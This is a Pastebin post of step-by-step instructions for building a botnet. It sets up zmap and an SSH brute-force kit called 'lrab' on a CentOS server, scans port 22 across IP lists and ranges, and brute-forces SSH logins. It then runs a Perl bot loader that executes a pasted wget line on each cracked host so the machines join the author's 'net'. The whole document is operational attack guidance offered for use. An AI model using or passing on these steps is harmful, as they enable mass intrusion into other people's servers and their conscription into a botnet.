Advertisement
lllANONYMOUSlll

zmap setup

Sep 11th, 2020
365
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ________ _____ _____  ______   _/  |_ __ ___/  |_
  2. \___   //     \\__  \ \____ \  \   __\  |  \   __\
  3.  /    /|  Y Y  \/ __ \|  |_> >  |  | |  |  /|  |  
  4. /_____ \__|_|  (____  /   __/   |__| |____/ |__|  
  5.       \/     \/     \/|__|                        
  6.  
  7. welcome to the zmap setup part of scanning by snap tcp :)
  8.  
  9. this is for centOS 6 x64 or centOS 7 x64
  10.  
  11. 1.so first log on to your scanning server and just type your user name and password
  12.  
  13. 2.next type this command (yum update -y) this will update all your dependecies overall your server
  14.  
  15. 3.next type these commands:
  16. yum install gcc cmake gmp gmp-devel libpcap-devel gengetopt byacc flex -y
  17. yum install json-c-doc.noarch json-c.i686 json-c.x86_64 json-c-devel.i686 json-c-devel.x86_64 -y
  18. yum install epel-release -y
  19. yum install gengetopt -y
  20. wget https://github.com/zmap/zmap/archive/v2.1.0.tar.gz
  21. tar -xvf v2.1.0.tar.gz
  22. cd zmap-2.1.0
  23. flex -o "src/lexer.c" --header-file="src/lexer.h" "src/lexer.l"
  24. byacc -d -o "src/parser.c" "src/parser.y"
  25. mkdir /etc/zmap
  26. cp conf/* /etc/zmap
  27. cmake -DENABLE_HARDENING=ON
  28. make
  29. make install
  30. cd
  31.  
  32. 4.so once you get finished with that just type (clear) now its time setup lrab
  33.  
  34. .__              ___.       __          __  
  35. |  |____________ \_ |__   _/  |_ __ ___/  |_
  36. |  |\_  __ \__  \ | __ \  \   __\  |  \   __\
  37. |  |_|  | \// __ \| \_\ \  |  | |  |  /|  |  
  38. |____/__|  (____  /___  /  |__| |____/ |__|  
  39.                 \/    \/                    
  40.  
  41. welcome to the lrab setup part of scanning by snap tcp :)
  42.  
  43. this is on the same server u put zmap on so dont close it
  44.  
  45. 1.open wnscp and login to your scanning server
  46.  
  47. 2.next drag your lrab folder into wnscp
  48.  
  49. 3.in your lrab file u should have these files
  50. -blackhat.pl (bot loader)
  51. -class
  52. -clean
  53. -cleanlist
  54. -dick
  55. -f1
  56. -f3
  57. -go
  58. -motd
  59. -pass_file
  60. -update
  61. -wget.pl (bot loader)
  62.  
  63. 4.so now once you have lrab on to your server u should have zmap and lrab by typing ls
  64.  
  65. 5.now type this command (cd LRAB) this will bring u into your lrab folder in your server
  66.  
  67. 6.now type this commands:
  68. --------------------------------------------------------------------------------------------------
  69. Net:SSH2 Error fix:
  70.  
  71. yum install gcc  cpan php-pear php-devel libssh2 libssh2-devel -y
  72. pecl install -f ssh2 touch /etc/php.d/ssh2.ini echo
  73. extension=ssh2.so>/etc/php.d/ssh2.ini
  74. cpan -fi Net::SSH2
  75. cpan -fi Parallel::ForkManager
  76. --------------------------------------------------------------------------------------------------
  77. If u get CPAN Errors then do this:
  78.  
  79. wget http://search.cpan.org/CPAN/authors/id/D/DL/DLUX/Parallel-ForkManager-0.7.5.tar.gz
  80. tar -xvf Para*
  81. cd Para*
  82. perl Makefile.PL
  83. make
  84. make install
  85. cd ../
  86. rm -rf Para*
  87. wget http://www.cpan.org/authors/id/S/SA/SALVA/Net-SSH2-0.59_23.tar.gz
  88. tar -xvf Net*
  89. cd Net*
  90. perl Makefile.PL
  91. make
  92. make install
  93. cd ../
  94. rm -rf Net*
  95. --------------------------------------------------------------------------------------------------
  96. 7.once you get done with that just type this command (chmod 777 *) this will give you premission to all the files in lrab,so every time you add a file to lrab through
  97. wnscp you gotta type that (chmod 777 *)
  98.  
  99. 8.so now your lrab is now setup and ready to scan and brute force :)
  100.  
  101. ________ _____ _____  ______     ______ ____ _____    ____   ____ |__| ____    ____   _/  |_ __ ___/  |_
  102. \___   //     \\__  \ \____ \   /  ___// ___\\__  \  /    \ /    \|  |/    \  / ___\  \   __\  |  \   __\
  103.  /    /|  Y Y  \/ __ \|  |_> >  \___ \\  \___ / __ \|   |  \   |  \  |   |  \/ /_/  >  |  | |  |  /|  |  
  104. /_____ \__|_|  (____  /   __/  /____  >\___  >____  /___|  /___|  /__|___|  /\___  /   |__| |____/ |__|  
  105.       \/     \/     \/|__|          \/     \/     \/     \/     \/        \//_____/                      
  106.  
  107. welcome to the zmap scanning part of scanning made by snap tcp :)
  108.  
  109. this is still on the same server :)
  110.  
  111. 1.so fist type this command (cd) to cd back into root directory
  112.  
  113. 2.now type this command (cd zmap-2.1.0) to go into zmap folder
  114.  
  115. 3.now to scan a lst file just type this command (zmap -p22 -wssh.lst -oBIG.txt -T 2) note that u can change the name of your lst file that you have (ssh.lst is just example)
  116.  
  117. 4.just wait till its over or stop when ever you feel like it by typing (ctrl+c)
  118.  
  119. 5.next type this command to put all those ips into a mfu.txt byt typing this (cat BIG.txt | sort | uniq > mfu.txt)
  120.  
  121. 6.now go to back into wnscp and go into to your zmap folder and drag the mfu.txt out of zmap by dragging it on top of the three little dots at the top,and then
  122. go out of zmap and now u should see the mfu.txt at the root directory and then you drag your mfu.txt into lrab and then after u do that go intp lrab folder and
  123. u should see the mfu.txt in there with all the the other files.
  124.  
  125. 7.now go back to putty and type this command (cd) to go back to root directory
  126.  
  127. 8.now type this command (cd LRAB) this will take u into lrab
  128.  
  129. 9.now u need premission to get use the mfu.txt so type this command (chmod 777 *)
  130.  
  131. 10.so now u need to brute force those ip's that in the mfu.txt so type this command (./update 15000 or 10000)
  132.  
  133. 11.after its done or you decide to stop it just type this command (ctrl+c)
  134.  
  135. 12.so if you go back to wnscp and you go into lrab folder and u click the little green refresh button u will see a vuln.txt
  136.  
  137. 13.so after u see that click on the wget.pl or what ever bot loader u have in lrab and click edit
  138.  
  139. 14.now find where it says this (( $channel->exec('link here'); )) so where it says link here paste your wget line there so bots will connect to your net
  140.  
  141. 15.so after that just save that and go back to putty and make sure your still in the lrab folder and type this command (clear) and after that type this command
  142. (chmod 777 *) to gain premission form the vuln.txt,so now everything should be green if you type ls,then type (clear) again to have a clear screen.
  143.  
  144. 16.so now u can scan those bots on to your net now.
  145.  
  146. 17.type this command (perl wget.pl vuln.txt or what haver bot loader u have) once u do that they should be going on to your net if they dont then u forgot
  147. to add your wget line into your bot loader or your ssh.lst was bad and all the bots was dead or scanned already.but no worries ima show u how to scan your own ranges now with lrab.
  148.  
  149. .__              ___.                                        .__                   __          __  
  150. |  |____________ \_ |__     ______ ____ _____    ____   ____ |__| ____    ____   _/  |_ __ ___/  |_
  151. |  |\_  __ \__  \ | __ \  /  ___// ___\\__  \ /    \ /    \|  |/    \ / ___\ \  __\ |  \  __\
  152. |  |_|  | \// __ \| \_\ \ \___ \\  \___ / __ \|   |  \  |  \ |   |  \/ /_/  >  |  | |  |  /|  |  
  153. |____/__|  (____  /___  / /____  >\___  >____  /___|  /___|  /__|___|  /\___  /   |__| |____/ |__|  
  154.                \/    \/       \/     \/     \/     \/     \/        \//_____/                      
  155.  
  156. welcome to the lrab scanning part of scanning made by snap tcp :)
  157.  
  158. this is still on the same server :)
  159.  
  160. 1.so fist type this command (cd) to cd back into root directory
  161.  
  162. 2.next type this command (cd LRAB) to go into your lrab folder on putty
  163.  
  164. 3.next go into wnscp and go into your lrab folder and remove all the mfu.txt,and vuln.txt u have in their becuase we are making new ones.
  165.  
  166. 4.so once that is done click on the dick file and click edit
  167.  
  168. 5.now u change the ranges but typing public ranges or your own if u have some
  169.  
  170. 6.now just save and exit once finished
  171.  
  172. 7.now go back onto putty and type this command (./dick) this will start your range scanning.you can go for how ever long u want to,but once your feel like u want
  173. to stope type this command (ctrl+c)
  174.  
  175. 8.now type (clear)
  176.  
  177. 9.now u need to do this command (cat bios.txt | sort | uniq > mfu.txt) this will sort it back into a mfu.txt
  178.  
  179. 10.now u need type (clear)
  180.  
  181. 11.then type this command (chmod 777 *) to gain permission for the mfu.txt
  182.  
  183. 12.now type this command to bruteforce those ips that u scanned with those ranges (./update 15000 or 10000)
  184.  
  185. 13.once its finished just type (clear)
  186.  
  187. 14.now type this command (chmod 777 *)
  188.  
  189. 15.then u type this command (perl wget.pl vuln.txt or what ever bot loader u have) this will send the bots to your net
  190.  
  191. -----------------------------------------------------------------------------------------------------------------------
  192. Every thing was wrote by snap tcp with courtesy or cia networking for the little help he gave me !!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement